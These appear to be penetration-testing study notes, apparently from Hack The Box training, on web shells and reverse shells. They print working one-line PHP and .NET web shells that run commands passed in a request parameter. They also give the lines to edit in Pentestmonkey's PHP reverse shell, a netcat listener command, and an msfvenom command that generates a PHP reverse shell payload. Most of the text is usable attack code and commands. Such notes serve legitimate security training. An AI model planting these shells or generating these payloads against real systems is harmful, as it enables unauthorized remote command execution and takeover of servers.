Web Shells

There are lot of good web shells online such as phpbashand p0wny-shell.

SecLists also have Web-shells in the /opt/useful/SecLists/Web-Shells directory.

Custom Web Shell

e.g PHP web shell

<?php system($_REQUEST['cmd']); ?>

We can execute commands by:


e.g .NET web shell

<% eval request('cmd') %>

Reverse Shell

Pentestmonkey’s PHP reverse shell is well known.

When using, we have to change the following lines:

$ip = 'OUR_IP';     // CHANGE THIS
$port = OUR_PORT;   // CHANGE THIS

Our netcat listener will intercept the incoming reverse shell connection request:

nc -lvnp OUR_PORT

Custom Reverse Shell

Sometimes system function is not allowed.

This is why we custom reverse shell sometimes.

We can use tools like msfvenom to create a reverse shell:

jadu101@htb[/htb]$ msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php
Payload size: 3033 bytes